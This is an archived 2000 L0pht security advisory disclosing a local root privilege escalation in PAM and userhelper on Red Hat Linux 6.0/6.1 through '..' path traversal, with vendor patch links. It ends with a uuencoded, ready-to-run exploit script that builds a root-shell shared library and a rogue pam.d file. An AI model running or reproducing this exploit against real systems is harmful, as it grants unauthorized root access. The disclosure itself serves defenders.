L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper

From: Dildog (dildogat_private)
Date: Tue Jan 04 2000 - 17:09:05 PST

  • Next message: Raymond Dijkxhoorn: "Re: Flaw in 3c59x.c or in Kernel?" 

                           L0pht Security Advisory

        Advisory Name: PamSlam
    Advisory Released: [01/04/00]
          Application: userhelper and PAM on Redhat Linux 6.0/6.1
             Severity: A local user can gain root access.
               Status: Vendor contacted. Fix provided by vendor.
                       Advisory released.
               Author: dildogat_private
                  WWW: http://www.l0pht.com/advisories.html

Overview:

 	Both 'pam' and 'userhelper' (a setuid binary that comes with the
'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
_pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
being setuid means we can get root.

Description:

	The combination of the fact that both userhelper and PAM follow ..
paths allows us to craft up a file that causes userhelper (by way of PAM) to
dlopen any shared object we want as root. The exploit is simple, and utilizes
the '-w' option of userhelper, which lets us specify a program to run with the
privileges designated by PAM. This tries to only execute programs that have
entries in /etc/security/console.apps, but since we get to specify the name,
something like ../../../tmp/myprog gets us a file open path that looks like
/etc/security/console.apps/../../../tmp/myprog. "strcat" is not a good way to
keep a filename below a directory!

	After this hurdle, PAM is called to start up the binary, and it does
the same thing, looking for the filename in /etc/pam.d. If we've placed a rogue
pam.d configuration file in /tmp/myprog, then it can be pointed to
/etc/pam.d/../../../tmp/myprog. In the pam.d configuration file, we get to pick
a few shared libraries to dlopen, so at this point, we get root.

The following exploit demonstrates this vulnerability by creating a
'rootshell library' that creates a shell when dlopened, creating a pam.d-style
configuration file, and then running userhelper with the appropriately dotted
path.


Quick solution:

	Download the fix from RedHat at:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm

   Red Hat Linux 6.0:

   Intel:
   ftp://updates.redhat.com/6.1/i386/pam-0.68-10.i386.rpm
   ftp://updates.redhat.com/6.1/i386/usermode-1.17-1.i386.rpm
   ftp://updates.redhat.com/6.0/i386/SysVinit-2.77-2.i386.rpm

   Alpha:
   ftp://updates.redhat.com/6.1/alpha/pam-0.68-10.alpha.rpm
   ftp://updates.redhat.com/6.1/alpha/usermode-1.17-1.alpha.rpm
   ftp://updates.redhat.com/6.0/alpha/SysVinit-2.77-2.alpha.rpm

   Sparc:
   ftp://updates.redhat.com/6.1/sparc/pam-0.68-10.sparc.rpm
   ftp://updates.redhat.com/6.1/sparc/usermode-1.17-1.sparc.rpm
   ftp://updates.redhat.com/6.0/sparc/SysVinit-2.77-2.sparc.rpm

   Source packages:
   ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-10.src.rpm
   ftp://updates.redhat.com/6.1/SRPMS/usermode-1.17-1.src.rpm
   ftp://updates.redhat.com/6.0/SRPMS/SysVinit-2.77-2.src.rpm
	
Exploit:

Uudecode the following script. Run the script.

begin 755 pamslam.sh
M(R$O8FEN+W-H"B,*(R!P86US;&%M("T@=G5L;F5R86)I;&ET>2!I;B!2961H
M870@3&EN=7@@-BXQ(&%N9"!004T@<&%M7W-T87)T"B,@9F]U;F0@8GD@9&EL
M9&]G0&PP<&AT+F-O;0HC("`*(R!S>6YO<'-I<SH*(R`@("!B;W1H("=P86TG
M(&%N9"`G=7-E<FAE;'!E<B<@*&$@<V5T=6ED(&)I;F%R>2!T:&%T(&-O;65S
M('=I=&@@=&AE"B,@("`@)W5S97)M;V1E+3$N,34G(')P;2D@9F]L;&]W("XN
M('!A=&AS+B!3:6YC92!P86U?<W1A<G0@8V%L;',@9&]W;B!T;PHC("`@(%]P
M86U?861D7VAA;F1L97(H*2P@=V4@8V%N(&=E="!I="!T;R!D;&]P96X@86YY
M(&9I;&4@;VX@9&ES:RX@)W5S97)H96QP97(G"B,@("`@8F5I;F<@<V5T=6ED
M(&UE86YS('=E(&-A;B!G970@<F]O="X@"B,*(R!F:7@Z(`HC("`@($YO(&9U
M8VMI;B!I9&5A(&9O<B!A(&=O;V0@9FEX+B!'970@<FED(&]F('1H92`N+B!P
M871H<R!I;B!U<V5R:&5L<&5R(`HC("`@(&9O<B!A('%U:6-K(&9I>"X@4F5M
M96UB97(@)W-T<F-A="<@:7-N)W0@82!V97)Y(&=O;V0@=V%Y(&]F(&-O;F9I
M;FEN9PHC("`@(&$@<&%T:"!T;R!A('!A<G1I8W5L87(@<W5B9&ER96-T;W)Y
M+@HC"B,@<')O<',@=&\@;7D@;6]M;7D@86YD(&1A9&1Y+"!C=7H@=&AE>2!M
M861E(&UE(&1R:6YK(&UY(&UI;&LN"@IC870@/B!?<&%M<VQA;2YC(#P\($5/
M1@HC:6YC;'5D93QS=&1L:6(N:#X*(VEN8VQU9&4\=6YI<W1D+F@^"B-I;F-L
M=61E/'-Y<R]T>7!E<RYH/@IV;VED(%]I;FET*'9O:60I"GL*("`@('-E='5I
M9"AG971E=6ED*"DI.PH@("`@<WES=&5M*"(O8FEN+W-H(BD["GT*14]&"@IE
M8VAO("UN("X*"F5C:&\@+64@875T:%Q<=')E<75I<F5D7%QT)%!71"]?<&%M
M<VQA;2YS;R`^(%]P86US;&%M+F-O;F8*8VAM;V0@-S4U(%]P86US;&%M+F-O
M;F8*"F5C:&\@+6X@+@H*9V-C("UF4$E#("UO(%]P86US;&%M+F\@+6,@7W!A
M;7-L86TN8PH*96-H;R`M;B!O"@IL9"`M<VAA<F5D("UO(%]P86US;&%M+G-O
M(%]P86US;&%M+F\*"F5C:&\@+6X@;PH*8VAM;V0@-S4U(%]P86US;&%M+G-O
M"@IE8VAO("UN($\*"G)M(%]P86US;&%M+F,*<FT@7W!A;7-L86TN;PH*96-H
M;R!/"@HO=7-R+W-B:6XO=7-E<FAE;'!E<B`M=R`N+B\N+B\N+B105T0O7W!A
M;7-L86TN8V]N9@H*<VQE97`@,7,*"G)M(%]P86US;&%M+G-O"G)M(%]P86US
*;&%M+F-O;F8*"@``
`
end



Boing.

dildogat_private

  [ For more advisories check out http://www.l0pht.com/advisories.html ]

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:26:13 PDT